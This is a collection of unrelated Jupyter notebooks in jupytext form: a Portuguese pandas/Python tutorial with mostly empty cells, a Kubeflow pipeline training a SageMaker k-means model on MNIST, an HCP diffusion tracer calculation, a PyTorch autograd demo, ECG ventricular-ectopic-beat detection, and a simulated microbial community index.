# Retorna o número de itens do dicionário.
# + id="k08YkCc1D1AJ" colab_type="code" colab={}
# + [markdown] id="yYNqIHJBD1AK" colab_type="text"
# ## *dict[ key ] = value*
#
# Inclui um item ao dicionário.
# + id="5jj3i52bD1AK" colab_type="code" colab={}
# + id="y6rso5hLD1AL" colab_type="code" colab={}
# + [markdown] id="_z0JySuqD1AL" colab_type="text"
# ## *del dict[ key ]*
#
# Remove o item de chave (*key*) do dicionário.
# + id="PPfh6sfID1AM" colab_type="code" colab={}
# + id="BtjGpXtGD1AN" colab_type="code" colab={}
# + [markdown] id="FodJVx5sD1AP" colab_type="text"
# # 3.3 Métodos de dicionários
# + [markdown] id="7pqdPOkYD1AP" colab_type="text"
# ## *dict.update()*
#
# Atualiza o dicionário.
# + id="DUySYxKQD1AQ" colab_type="code" colab={}
# + id="DLsqp71cD1AR" colab_type="code" colab={}
# + [markdown] id="JLs5c0DeD1AR" colab_type="text"
# ## *dict.copy()*
#
# Cria uma cópia do dicionário.
# + id="X9F7OB3eD1AS" colab_type="code" colab={}
# + id="v0rL0bveD1AS" colab_type="code" colab={}
# + id="M-abRGGrD1AT" colab_type="code" colab={}
# + id="ETBD0TkND1AU" colab_type="code" colab={}
# + [markdown] id="mNODkmHCD1AV" colab_type="text"
# ## *dict.pop(key[, default ])*
#
# Se a chave for encontrada no dicionário, o item é removido e seu valor é retornado. Caso contrário, o valor especificado como *default* é retornado. Se o valor *default* não for fornecido e a chave não for encontrada no dicionário um erro será gerado.
# + id="_4QEPwScD1AW" colab_type="code" colab={}
# + id="Hjh0MuymD1AX" colab_type="code" colab={}
# + id="f51rKjkuD1AX" colab_type="code" colab={}
# + id="Ah4sZ7axD1AZ" colab_type="code" colab={}
# + id="SJATRY8RD1Aa" colab_type="code" colab={}
# + id="V36wHdzmD1Ab" colab_type="code" colab={}
# + id="LJ0lQIrdD1Ac" colab_type="code" colab={}
# + id="yKGu-fYkD1Ad" colab_type="code" colab={}
# + id="x-h8nVyhD1Af" colab_type="code" colab={}
# + [markdown] id="Q5J0R7d3D1Ag" colab_type="text"
# ## *dict.clear()*
#
# Remove todos os itens do dicionário.
# + id="AvkP_8mND1Ag" colab_type="code" colab={}
# + id="S69pMYboD1Ah" colab_type="code" colab={}
# + [markdown] id="QhoSRfPsD1Ai" colab_type="text"
# # 3.4 Iterando em dicionários
# + [markdown] id="E-agaqakD1Ai" colab_type="text"
# ## *dict.keys()*
#
# Retorna uma lista contendo as chaves (*keys*) do dicionário.
# + id="qFADEYmBD1Aj" colab_type="code" colab={}
# + id="niwh9AgDD1Aj" colab_type="code" colab={}
# + [markdown] id="qFj6Cc7dD1Ak" colab_type="text"
# ## *dict.values()*
#
# Retorna uma lista com todos os valores (*values*) do dicionário.
# + id="nfpLxrQVD1Al" colab_type="code" colab={}
# + [markdown] id="-NGRwX0AD1Al" colab_type="text"
# ## *dict.items()*
#
# Retorna uma lista contendo uma tupla para cada par chave-valor (*key-value*) do dicionário.
# + id="Q2I9_6YvD1Am" colab_type="code" colab={}
# + id="0j41ZqgQD1Am" colab_type="code" colab={}
# + id="OVY9rIwFD1An" colab_type="code" colab={}
# + id="ma2Ol8vcD1Ap" colab_type="code" colab={}
# + [markdown] id="-q3AlSg3D1Aq" colab_type="text"
# # <font color=green> 4. FUNÇÕES E PACOTES
# ---
#
# Funções são unidades de código reutilizáveis que realizam uma tarefa específica, podem receber alguma entrada e também podem retornar alguma resultado.
# + [markdown] id="5CfEcU58D1Aq" colab_type="text"
# # 4.1 Built-in function
#
# A linguagem Python possui várias funções integradas que estão sempre acessíveis. Algumas já utilizamos em nosso treinamento: type(), print(), zip(), len(), set() etc.
#
# https://docs.python.org/3.6/library/functions.html
# + id="DP7cmY7xD1Aq" colab_type="code" colab={}
dados = {'Jetta Variant': 88078.64, 'Passat': 106161.94, 'Crossfox': 72832.16}
dados
# + id="5zAcGSCbD1Ar" colab_type="code" colab={}
# + id="zG9_jU_1D1At" colab_type="code" colab={}
# + id="jn0O3uXZD1Au" colab_type="code" colab={}
# + id="lnUjKVnoD1Aw" colab_type="code" colab={}
# + id="WdEuYXe2D1Ay" colab_type="code" colab={}
# + id="hIA29O3tD1Az" colab_type="code" colab={}
# + [markdown] id="6w62Sl5ZD1A0" colab_type="text"
# # 4.2 Definindo funções sem e com parâmetros
# + [markdown] id="OADZiBP2D1A0" colab_type="text"
# ### Funções sem parâmetros
#
# #### Formato padrão
#
# ```
# def <nome>():
# <instruções>
# ```
# + id="uCkplEpQD1A0" colab_type="code" colab={}
# + id="fOCEGq5VD1A1" colab_type="code" colab={}
# + [markdown] id="PwSlYSVAD1A2" colab_type="text"
# ### Funções com parâmetros
#
# #### Formato padrão
#
# ```
# def <nome>(<param_1>, <param_2>, ..., <param_n>):
# <instruções>
# ```
# + id="A3YnBUduD1A3" colab_type="code" colab={}
# + id="rGUZbRERD1A3" colab_type="code" colab={}
# + id="B9WDlRE7D1A5" colab_type="code" colab={}
# + id="1HAy8OK_D1A6" colab_type="code" colab={}
# + id="_CDa4oOfD1A6" colab_type="code" colab={}
# + id="xH-mxqYAD1A8" colab_type="code" colab={}
# + id="WXXC_UidD1A8" colab_type="code" colab={}
# + [markdown] id="8zNYrmFbD1A9" colab_type="text"
# # 4.3 Definindo funções que retornam valores
# + [markdown] id="J44K-dMOD1A9" colab_type="text"
# ### Funções que retornam um valor
#
# #### Formato padrão
#
# ```
# def <nome>(<param_1>, <param_2>, ..., <param_n>):
# <instruções>
# return <resultado>
# ```
# + id="-UG42RQJD1A9" colab_type="code" colab={}
# + id="VJwdvoT5D1A-" colab_type="code" colab={}
# + id="AgAeJkpND1A-" colab_type="code" colab={}
# + id="_r616TevD1A_" colab_type="code" colab={}
# + [markdown] id="MQaK8GV5D1BA" colab_type="text"
# ### Funções que retornam mais de um valor
#
# #### Formato padrão
#
# ```
# def <nome>(<param_1>, <param_2>, ..., <param_n>):
# <instruções>
# return (<resultado_1>, <resultado_2>, ..., <resultado_n>)
# ```
# + id="v0PUMegVD1BA" colab_type="code" colab={}
# + id="Ys-etom8D1BA" colab_type="code" colab={}
# + id="LERrvkMHD1BC" colab_type="code" colab={}
# + id="sqoFOWSsD1BC" colab_type="code" colab={}
# + id="NdB_Jyw_D1BD" colab_type="code" colab={}
# + [markdown] id="uQ5lNnKrD1BD" colab_type="text"
# # <font color=green> 5. PANDAS BÁSICO
# ---
#
# **versão: 0.25.2**
#
# Pandas é uma ferramenta de manipulação de dados de alto nível, construída com base no pacote Numpy. O pacote pandas possui estruturas de dados bastante interessantes para manipulação de dados e por isso é muito utilizado por cientistas de dados.
#
#
# ## Estruturas de Dados
#
# ### Series
#
# Series são arrays unidimensionais rotulados capazes de armazenar qualquer tipo de dado. Os rótulos das linhas são chamados de **index**. A forma básica de criação de uma Series é a seguinte:
#
#
# ```
# s = pd.Series(dados, index = index)
# ```
#
# O argumento *dados* pode ser um dicionário, uma lista, um array Numpy ou uma constante.
#
# ### DataFrames
#
# DataFrame é uma estrutura de dados tabular bidimensional com rótulos nas linha e colunas. Como a Series, os DataFrames são capazes de armazenar qualquer tipo de dados.
#
#
# ```
# df = pd.DataFrame(dados, index = index, columns = columns)
# ```
#
# O argumento *dados* pode ser um dicionário, uma lista, um array Numpy, uma Series e outro DataFrame.
#
# **Documentação:** https://pandas.pydata.org/pandas-docs/version/0.25/
# + [markdown] id="2qa7RC03D1BD" colab_type="text"
# # 5.1 Estruturas de dados
# + id="4QyFDeS4D1BD" colab_type="code" colab={}
# + [markdown] id="kIey8_OcD1BF" colab_type="text"
# ### Criando uma Series a partir de uma lista
# + id="yEZR6DWiD1BF" colab_type="code" colab={}
# + id="rLudWKZ_D1BF" colab_type="code" colab={}
# + [markdown] id="VYVIKd1-D1BG" colab_type="text"
# ### Criando um DataFrame a partir de uma lista de dicionários
# + id="QFNS9PckD1BG" colab_type="code" colab={}
dados = [
{'Nome': 'Jetta Variant', 'Motor': 'Motor 4.0 Turbo', 'Ano': 2003, 'Quilometragem': 44410.0, 'Zero_km': False, 'Valor': 88078.64},
{'Nome': 'Passat', 'Motor': 'Motor Diesel', 'Ano': 1991, 'Quilometragem': 5712.0, 'Zero_km': False, 'Valor': 106161.94},
{'Nome': 'Crossfox', 'Motor': 'Motor Diesel V8', 'Ano': 1990, 'Quilometragem': 37123.0, 'Zero_km': False, 'Valor': 72832.16}
]
# + id="WDQb9AnKD1BH" colab_type="code" colab={}
# + id="-2-jGvmGD1BI" colab_type="code" colab={}
# + id="2kbyOThiD1BJ" colab_type="code" colab={}
# + [markdown] id="pJK2tQgYD1BK" colab_type="text"
# ### Criando um DataFrame a partir de um dicionário
# + id="WKNQwKucD1BK" colab_type="code" colab={}
dados = {
'Nome': ['Jetta Variant', 'Passat', 'Crossfox'],
'Motor': ['Motor 4.0 Turbo', 'Motor Diesel', 'Motor Diesel V8'],
'Ano': [2003, 1991, 1990],
'Quilometragem': [44410.0, 5712.0, 37123.0],
'Zero_km': [False, False, False],
'Valor': [88078.64, 106161.94, 72832.16]
}
# + id="lKnuZfzcD1BK" colab_type="code" colab={}
# + id="PNqTytC-D1BL" colab_type="code" colab={}
# + [markdown] id="fCCXs0reD1BL" colab_type="text"
# ### Criando um DataFrame a partir de uma arquivo externo
# + id="78PRHGeZD1BL" colab_type="code" colab={}
# + id="1o1YlnVPD1BM" colab_type="code" colab={}
# + [markdown] id="y5V-1AK-D1BN" colab_type="text"
# # 5.2 Seleções com DataFrames
# + [markdown] id="wZjqlHe9D1BN" colab_type="text"
# ### Selecionando colunas
# + id="gM3LbtzlD1BN" colab_type="code" colab={}
# + id="R2FWgCM_D1BO" colab_type="code" colab={}
# + id="lCCumsxsD1BP" colab_type="code" colab={}
# + id="zxlyC3B8D1BP" colab_type="code" colab={}
# + [markdown] id="7RPXPm1XD1BQ" colab_type="text"
# ### Selecionando linhas - [ i : j ]
#
# <font color=red>**Observação:**</font> A indexação tem origem no zero e nos fatiamentos (*slices*) a linha com índice i é **incluída** e a linha com índice j **não é incluída** no resultado.
# + id="PdDUwPw3D1BQ" colab_type="code" colab={}
# + [markdown] id="G3DMSk97D1BR" colab_type="text"
# ### Utilizando .loc para seleções
#
# <font color=red>**Observação:**</font> Seleciona um grupo de linhas e colunas segundo os rótulos ou uma matriz booleana.
# + id="Ftg-hNOoD1BR" colab_type="code" colab={}
# + id="xdxkDrHvD1BS" colab_type="code" colab={}
# + id="pMN3U1KjD1BS" colab_type="code" colab={}
# + id="oOEO72uZD1BT" colab_type="code" colab={}
# + [markdown] id="SYKEe3vCD1BT" colab_type="text"
# ### Utilizando .iloc para seleções
#
# <font color=red>**Observação:**</font> Seleciona com base nos índices, ou seja, se baseia na posição das informações.
# + id="U4Bru90bD1BT" colab_type="code" colab={}
# + id="iLKUyrzND1BU" colab_type="code" colab={}
# + id="KGZpixYUD1BU" colab_type="code" colab={}
# + id="GxdqIz4LD1BV" colab_type="code" colab={}
# + id="AVIhs7uLD1BW" colab_type="code" colab={}
# + [markdown] id="eAbwq1oLD1BW" colab_type="text"
# # 5.3 Queries com DataFrames
# + id="AOZTWzehD1BW" colab_type="code" colab={}
# + id="rO5T4h94D1BX" colab_type="code" colab={}
# + id="STZ-l8oaD1BX" colab_type="code" colab={}
# + id="OZC8NAn6D1BX" colab_type="code" colab={}
# + id="OzXC2M40D1BY" colab_type="code" colab={}
# + [markdown] id="_XKXcWO-D1BY" colab_type="text"
# ### Utilizando o método query
# + id="AB9JirSoD1BY" colab_type="code" colab={}
# + [markdown] id="ciJ4dw_FD1BZ" colab_type="text"
# # 5.4 Iterando com DataFrames
# + id="TKAB-g5KD1BZ" colab_type="code" colab={}
# + id="eFTNtPRWD1Ba" colab_type="code" colab={}
# + [markdown] id="HnUzHFQPD1Ba" colab_type="text"
# # 5.5 Tratamento de dados
# + id="FRxBWoBGD1Ba" colab_type="code" colab={}
# + id="HHSwH0ZaD1Bc" colab_type="code" colab={}
# + id="G27pxgZ5D1Bd" colab_type="code" colab={}
# + id="DhlRbxy2D1Bd" colab_type="code" colab={}
# + id="OL04QU5RD1Be" colab_type="code" colab={}
# + id="fTH2JkGDD1Bf" colab_type="code" colab={}
# + id="lure2GvpD1Bg" colab_type="code" colab={}
# + id="4-ZvhXjvD1Bj" colab_type="code" colab={}
# + id="MQUw7i1OD1Bk" colab_type="code" colab={}
# + id="U4Cse7miD1Bl" colab_type="code" colab={}
# + id="8L4wum05D1Bl" colab_type="code" colab={}
# + id="8iLOc-U3D1Bm" colab_type="code" colab={}
| 5_Semana-Python_para_Data_Science/Python_para_Data_Science_Pandas.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Mnist classification pipeline using Sagemaker
#
# The `mnist-classification-pipeline.py` sample runs a pipeline to train a classficiation model using Kmeans with MNIST dataset on Sagemaker.
# We will have all required steps here and for other details like how to get source data, please check [documentation](https://github.com/kubeflow/pipelines/tree/master/samples/contrib/aws-samples/mnist-kmeans-sagemaker).
#
#
# This sample is based on the [Train a Model with a Built-in Algorithm and Deploy it](https://docs.aws.amazon.com/sagemaker/latest/dg/ex1.html).
#
# The sample trains and deploy a model based on the [MNIST dataset](http://www.deeplearning.net/tutorial/gettingstarted.html).
#
#
# ## Prerequisite
# 1. Create an S3 bucket to store pipeline data
#
# > Note: Be sure to change the HASH variable to random hash and change AWS_REGION before running next cell
#
# > Note: you use us-east-1, please use command `!aws s3 mb s3://$S3_BUCKET --region $AWS_REGION --endpoint-url https://s3.us-east-1.amazonaws.com`
HASH = 'abc123'
AWS_REGION = 'us-west-2'
S3_BUCKET = '{}-kubeflow-pipeline-data'.format(HASH)
# !aws s3 mb s3://$S3_BUCKET --region $AWS_REGION
# 2. Copy dataset
#
# > Copy `data` and `valid_data.csv` into your S3 bucket.
# +
# !aws s3 cp s3://kubeflow-pipeline-data/mnist_kmeans_example/data s3://$S3_BUCKET/mnist_kmeans_example/data
# !aws s3 cp s3://kubeflow-pipeline-data/mnist_kmeans_example/input/valid_data.csv s3://$S3_BUCKET/mnist_kmeans_example/input/
# -
# 3. Grant SageMaker permission
# > Typically in a production environment, you would assign fine-grained permissions depending on the nature of actions you take and leverage tools like [IAM Role for Service Account](https://docs.aws.amazon.com/eks/latest/userguide/iam-roles-for-service-accounts.html) for securing access to AWS resources but for simplicity we will assign AmazonSageMakerFullAccess IAM policy. You can read more about granular policies [here](https://docs.aws.amazon.com/sagemaker/latest/dg/sagemaker-roles.html)
#
# > In order to run this pipeline, we need two levels of IAM permissions
#
# > a) create Kubernetes secrets **aws-secret** with Sagemaker policies. Please make sure to create `aws-secret` in kubeflow namespace.
#
# ```yaml
# apiVersion: v1
# kind: Secret
# metadata:
# name: aws-secret
# namespace: kubeflow
# type: Opaque
# data:
# AWS_ACCESS_KEY_ID: YOUR_BASE64_ACCESS_KEY
# AWS_SECRET_ACCESS_KEY: YOUR_BASE64_SECRET_ACCESS
# ```
# > Note: To get base64 string, try `echo -n $AWS_ACCESS_KEY_ID | base64`
#
# > b) create an IAM execution role for Sagemaker so that the job can assume this role in order to perform Sagemaker actions. Make a note of this role as you will need it during pipeline creation step
#
# 4. Install Kubeflow Pipelines SDK
# > You can skip this step if its already installed. You can validate if you have SDK installed by running `!pip show kfp`. The notebook has been tested for kfp v0.1.29 release
# +
# !pip install https://storage.googleapis.com/ml-pipeline/release/0.1.29/kfp.tar.gz --upgrade
# !pip show kfp
# -
# ## Build pipeline
# 1. Run the following command to load Kubeflow Pipelines SDK
import kfp
from kfp import components
from kfp import dsl
from kfp.aws import use_aws_secret
# 2. Load reusable sagemaker components.
sagemaker_train_op = components.load_component_from_url('https://raw.githubusercontent.com/kubeflow/pipelines/0ad6c28d32e2e790e6a129b7eb1de8ec59c1d45f/components/aws/sagemaker/train/component.yaml')
sagemaker_model_op = components.load_component_from_url('https://raw.githubusercontent.com/kubeflow/pipelines/0ad6c28d32e2e790e6a129b7eb1de8ec59c1d45f/components/aws/sagemaker/model/component.yaml')
sagemaker_deploy_op = components.load_component_from_url('https://raw.githubusercontent.com/kubeflow/pipelines/0ad6c28d32e2e790e6a129b7eb1de8ec59c1d45f/components/aws/sagemaker/deploy/component.yaml')
sagemaker_batch_transform_op = components.load_component_from_url('https://raw.githubusercontent.com/kubeflow/pipelines/0ad6c28d32e2e790e6a129b7eb1de8ec59c1d45f/components/aws/sagemaker/batch_transform/component.yaml')
#
#
# 3. Create pipeline.
#
# We will create a training job first. Once training job is done, it will persist trained model to S3.
#
# Then a job will be kicked off to create a `Model` manifest in Sagemaker.
#
# With this model, batch transformation job can use it to predict on other datasets, prediction service can create an endpoint using it.
#
#
# > Note: remember to use pass your **role_arn** to successfully run the job.
#
# > Note: If you use a different region, please replace `us-west-2` with your region.
#
# > Note: ECR Images for k-means algorithm
#
# |Region| ECR Image|
# |------|----------|
# |us-west-1|632365934929.dkr.ecr.us-west-1.amazonaws.com|
# |us-west-2|174872318107.dkr.ecr.us-west-2.amazonaws.com|
# |us-east-1|382416733822.dkr.ecr.us-east-1.amazonaws.com|
# |us-east-2|404615174143.dkr.ecr.us-east-2.amazonaws.com|
# |us-gov-west-1|226302683700.dkr.ecr.us-gov-west-1.amazonaws.com|
# |ap-east-1|286214385809.dkr.ecr.ap-east-1.amazonaws.com|
# |ap-northeast-1|351501993468.dkr.ecr.ap-northeast-1.amazonaws.com|
# |ap-northeast-2|835164637446.dkr.ecr.ap-northeast-2.amazonaws.com|
# |ap-south-1|991648021394.dkr.ecr.ap-south-1.amazonaws.com|
# |ap-southeast-1|475088953585.dkr.ecr.ap-southeast-1.amazonaws.com|
# |ap-southeast-2|712309505854.dkr.ecr.ap-southeast-2.amazonaws.com|
# |ca-central-1|469771592824.dkr.ecr.ca-central-1.amazonaws.com|
# |eu-central-1|664544806723.dkr.ecr.eu-central-1.amazonaws.com|
# |eu-north-1|669576153137.dkr.ecr.eu-north-1.amazonaws.com|
# |eu-west-1|438346466558.dkr.ecr.eu-west-1.amazonaws.com|
# |eu-west-2|644912444149.dkr.ecr.eu-west-2.amazonaws.com|
# |eu-west-3|749696950732.dkr.ecr.eu-west-3.amazonaws.com|
# |me-south-1|249704162688.dkr.ecr.me-south-1.amazonaws.com|
# |sa-east-1|855470959533.dkr.ecr.sa-east-1.amazonaws.com|
# +
# Configure your s3 bucket.
S3_BUCKET = '{}-kubeflow-pipeline-data'.format(HASH)
S3_PIPELINE_PATH='s3://{}/mnist_kmeans_example'.format(S3_BUCKET)
# Configure your Sagemaker execution role.
SAGEMAKER_ROLE_ARN='<your_sagemaker_role>'
@dsl.pipeline(
name='MNIST Classification pipeline',
description='MNIST Classification using KMEANS in SageMaker'
)
def mnist_classification(region='us-west-2',
image='174872318107.dkr.ecr.us-west-2.amazonaws.com/kmeans:1',
dataset_path=S3_PIPELINE_PATH + '/data',
instance_type='ml.c4.8xlarge',
instance_count='2',
volume_size='50',
model_output_path=S3_PIPELINE_PATH + '/model',
batch_transform_input=S3_PIPELINE_PATH + '/input',
batch_transform_ouput=S3_PIPELINE_PATH + '/output',
role_arn=SAGEMAKER_ROLE_ARN
):
training = sagemaker_train_op(
region=region,
image=image,
instance_type=instance_type,
instance_count=instance_count,
volume_size=volume_size,
dataset_path=dataset_path,
model_artifact_path=model_output_path,
role=role_arn,
).apply(use_aws_secret('aws-secret', 'AWS_ACCESS_KEY_ID', 'AWS_SECRET_ACCESS_KEY'))
create_model = sagemaker_model_op(
region=region,
image=image,
model_artifact_url=training.outputs['model_artifact_url'],
model_name=training.outputs['job_name'],
role=role_arn
).apply(use_aws_secret('aws-secret', 'AWS_ACCESS_KEY_ID', 'AWS_SECRET_ACCESS_KEY'))
prediction = sagemaker_deploy_op(
region=region,
model_name=create_model.output
).apply(use_aws_secret('aws-secret', 'AWS_ACCESS_KEY_ID', 'AWS_SECRET_ACCESS_KEY'))
batch_transform = sagemaker_batch_transform_op(
region=region,
model_name=create_model.output,
input_location=batch_transform_input,
output_location=batch_transform_ouput
).apply(use_aws_secret('aws-secret', 'AWS_ACCESS_KEY_ID', 'AWS_SECRET_ACCESS_KEY'))
# -
# 4. Compile your pipeline
kfp.compiler.Compiler().compile(mnist_classification, 'mnist-classification-pipeline.zip')
# 5. Deploy your pipeline
client = kfp.Client()
aws_experiment = client.create_experiment(name='aws')
my_run = client.run_pipeline(aws_experiment.id, 'mnist-classification-pipeline',
'mnist-classification-pipeline.zip')
# ## Prediction
#
# Open Sagemaker console and find your endpoint name. Please check dataset section to get train_set.
#
# Once your pipeline is done, you can find sagemaker endpoint name and replace `ENDPOINT_NAME` value with your newly created endpoint name.
#
#
# > Note: make sure to attach `sagemaker:InvokeEndpoint` to the worker node nodegroup that is running this jupyter notebook.
#
# ```json
# {
# "Version": "2012-10-17",
# "Statement": [
# {
# "Effect": "Allow",
# "Action": [
# "sagemaker:InvokeEndpoint"
# ],
# "Resource": "*"
# }
# ]
# }
#
# ```
#
# !pip install boto3 --user
# ## Find your Endpoint name in AWS Console
#
# Open AWS console and enter Sagemaker service, find the endpoint name as the following picture shows.
#
# 
# +
import pickle, gzip, numpy, urllib.request, json
from urllib.parse import urlparse
import json
import io
import boto3
# Replace the endpoint name with yours.
ENDPOINT_NAME='Endpoint-20190916223205-Y635'
# Load the dataset
urllib.request.urlretrieve("http://deeplearning.net/data/mnist/mnist.pkl.gz", "mnist.pkl.gz")
with gzip.open('mnist.pkl.gz', 'rb') as f:
train_set, valid_set, test_set = pickle.load(f, encoding='latin1')
# Simple function to create a csv from our numpy array
def np2csv(arr):
csv = io.BytesIO()
numpy.savetxt(csv, arr, delimiter=',', fmt='%g')
return csv.getvalue().decode().rstrip()
runtime = boto3.Session(region_name='us-west-2').client('sagemaker-runtime')
payload = np2csv(train_set[0][30:31])
response = runtime.invoke_endpoint(EndpointName=ENDPOINT_NAME,
ContentType='text/csv',
Body=payload)
result = json.loads(response['Body'].read().decode())
print(result)
# -
# ## Clean up
#
# Go to Sagemaker console and delete `endpoint`, `model`.
# ### Clean up S3 bucket
# Delete S3 bucket that was created for this exercise
# !aws s3 rb s3://$S3_BUCKET --force
| sagemaker-kubeflow-pipeline/02_Kubeflow_Pipeline_SageMaker.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # HCP tracer calculation
# What follows is the calculation of the tracer correlation for an HCP crystal (ideal $c/a = \sqrt{8/3}$, $a_0 = 1$, and $\nu = 1$, all for convenience).
import numpy as np
from onsager import OnsagerCalc
from onsager import crystal
import matplotlib.pyplot as plt
# %matplotlib inline
HCP = crystal.Crystal.HCP(1., chemistry="ideal HCP")
print(HCP)
sitelist = HCP.sitelist(0)
vacancyjumps = HCP.jumpnetwork(0, 1.01)
for jlist in vacancyjumps:
print('---')
for (i,j), dx in jlist:
print(i, '-', j, dx)
HCPdiffuser = OnsagerCalc.VacancyMediated(HCP, 0, sitelist, vacancyjumps, 1)
for state in HCPdiffuser.interactlist():
print(state)
nu0 = 1
dE0 = 1
HCPtracer = {'preV': np.ones(1), 'eneV': np.zeros(1),
'preT0': np.array([nu0, nu0]), 'eneT0': np.array([dE0, dE0])}
HCPtracer.update(HCPdiffuser.maketracerpreene(**HCPtracer))
for k,v in zip(HCPtracer.keys(), HCPtracer.values()): print(k,v)
Lvv, Lss, Lsv, L1vv = HCPdiffuser.Lij(*HCPdiffuser.preene2betafree(1, **HCPtracer))
# Correlation coefficient = $L_\text{ss} / L_\text{sv}$ (as $L_\text{sv} = L_\text{vv}$). Should be very close to the FCC correlation coefficient of 0.78145, for this purely isotropic diffusion case.
np.dot(Lss, np.linalg.inv(Lsv))
print(HCPdiffuser.GFvalues)
print(crystal.yaml.dump(HCPdiffuser.GFvalues))
diffcopy = crystal.yaml.load(crystal.yaml.dump(HCPdiffuser))
diffcopy.Lij(*diffcopy.preene2betafree(1, **HCPtracer))
print(crystal.yaml.dump(HCPtracer))
| examples/HCPtracer.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: learning-physics-3z9zxMLf
# language: python
# name: learning-physics-3z9zxmlf
# ---
# ### Inspiration:
# https://arxiv.org/pdf/1807.10300.pdf
import torch
# Create tensors.
x = torch.tensor(1., requires_grad=True)
w = torch.tensor(2., requires_grad=True)
b = torch.tensor(3., requires_grad=True)
# Build a computational graph.
y = w * x + b # y = 2 * x + 3
# Compute gradients.
y.backward()
# Print out the gradients.
print(x.grad) # x.grad = 2
print(w.grad) # w.grad = 1
print(b.grad) # b.grad = 1
| Untitled.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Ventricular Ectopic Beats Detection
# In this notebook we are going to detect VEBs in an ecg signal using PCA and Hotelling $T^2$ statistics
import scipy.io as sio
from scipy.spatial.distance import mahalanobis
from matplotlib.mlab import PCA
import numpy as np
import matplotlib.pyplot as plt
# %matplotlib inline
# ## Helper functions
def find(a, func):
return [i for (i, val) in enumerate(a) if func(val)]
# ## Load signal data
# +
mat = sio.loadmat("data/ventricular_ectopic_beats.mat")
signalECG = mat['signalECG'][0]
samplerate = mat['samplerate'][0][0]
rPoints = mat['rPoints'][0]
L = len(signalECG)
# -
# ## Segmentation of QRS-complexes
# +
# Count R-peaks
numberQRS = len(rPoints)
# Segmentation window: 50 ms
steps = int(np.round(samplerate*0.05))
# Define matrix 'QRS' for the segmented QRS complexes
QRS = np.zeros((numberQRS,2*steps+1))
# Segmentation
for k in range(numberQRS):
i = rPoints[k]
QRS[k,:] = signalECG[i-steps:i+steps+1]
# -
# ## PCA
# https://www.clear.rice.edu/comp130/12spring/pca/pca_docs.shtml
result = PCA(QRS)
score = np.sum(result.project(QRS), axis=1)
# ## Classify VEBs with T^2 threshold
# https://docs.scipy.org/doc/scipy-0.14.0/reference/generated/scipy.spatial.distance.mahalanobis.html
# +
def mahal(x, y):
covariance_xy = np.cov(x,y, rowvar=0)
inv_covariance_xy = np.linalg.inv(covariance_xy)
xy_mean = np.mean(x),np.mean(y)
x_diff = np.array([x_i - xy_mean[0] for x_i in x])
y_diff = np.array([y_i - xy_mean[1] for y_i in y])
diff_xy = np.transpose([x_diff, y_diff])
md = np.zeros((len(diff_xy)))
for i in range(len(diff_xy)):
md[i] = np.sqrt(np.dot(np.dot(np.transpose(diff_xy[i]),inv_covariance_xy),diff_xy[i]))
return md
# Calculate T^2 in the reduced principal component space
tsqreduced = mahal(score, score)
# Define threshold
thres = 3*np.mean(tsqreduced)
# Thresholding of the T^2 vector of the reduced space
thresVec = tsqreduced
thresVec[thresVec < thres] = 0
# Indices of the detected VEBs
ind = find(thresVec, lambda x: x > 0)
VEBpoints = rPoints[ind]
# -
# ## Plot results
# +
t = np.arange(0,L)/samplerate
plt.figure(figsize=(20, 12))
plt.subplot(2,1,1)
plt.plot(t[0:2*steps+1],QRS.T)
plt.plot(t[0:2*steps+1],np.mean(QRS, axis=0),'c','LineWidth',4)
plt.xlabel('Time (s)')
plt.ylabel('Signal amplitude')
plt.title('Segemented QRS-complexes')
plt.legend(['QRS', 'Average beat'])
# Plot ECG signal with marked R-peaks of normal and ectopic beats
plt.subplot(2,1,2)
plt.plot(t,signalECG)
plt.plot(t[rPoints],signalECG[rPoints],'rs')
plt.plot(t[VEBpoints],signalECG[VEBpoints],'go')
plt.xlabel('Time (s)')
plt.ylabel('Signal amplitude')
plt.title('ECG signal with marked R-peaks of normal beats and VEBs')
plt.legend(['ECG signal','R-peaks','VEBs','Location','NorthEastOutside'])
plt.plot()
# -
| Ventricular Ectopic Beats Detection.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python [default]
# language: python
# name: python3
# ---
# # Simulated Communities
#
# Simulated communities are synthetically composed collections of sequences, which are intended to resemble sequence collections assembled from natural microbial communities. Simulated communities share some similarities to the simulated reads used for [cross-validation of taxonomy assignment](../cross-validated/index.ipynb), in that they are assembled from reference sequences with known taxonomy annotations. Simulated communities have the added exceptions that these artifical sequences are present at known abundances, and simulate a natural community. While the composition of a simulated community is derived from the observed composition of a natural community, there is an essential difference: as the sequences in a simulated community are drawn from annotated reference sequences, the taxonomic composition of a simulated community is known in advance, whereas a natural community is not (and even after taxonomic classification, is still not known with certainty). This makes simulated communities useful for assessing the performance of taxonomy classification and other methods. Given the similarities with simulated reads used for cross-validated taxonomy assignment, method performance should perform fairly similar, but simulated communities give us some idea of how method and parameter configuration affect the observed composition of microbial communities.
#
# Simulated communities have an additional function: to test prior probability training for machine-learning classifiers. Prior probabilities are used by some classification methods to predict the likelihood that a given class label will be observed in a population. Training prior probabilities may improve classification accuracy, particularly in situations when specific taxa are unique to an environment. This is opposed to the use of a uniform prior, which assumes that any class is equally likely to be observed in a given environment. While this is a prudent approach when handling unknown samples, it is a naive approach when handling samples from previously characterized sample types.
#
# ## Contents
# The following notebooks generate, assign taxonomy to, and evaluate simulated communities:
#
# 1) **[Generate simulated communities](./dataset-generation.ipynb)** derived from natural community compositions
#
# 2) **[Assign taxonomy](./taxonomy-assignment.ipynb)** to simulated community sequences.
#
# 3) **[Evaluate classification accuracy](./evaluate-classification-accuracy.ipynb)** of simulated communities.
#
| ipynb/simulated-community/Index.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
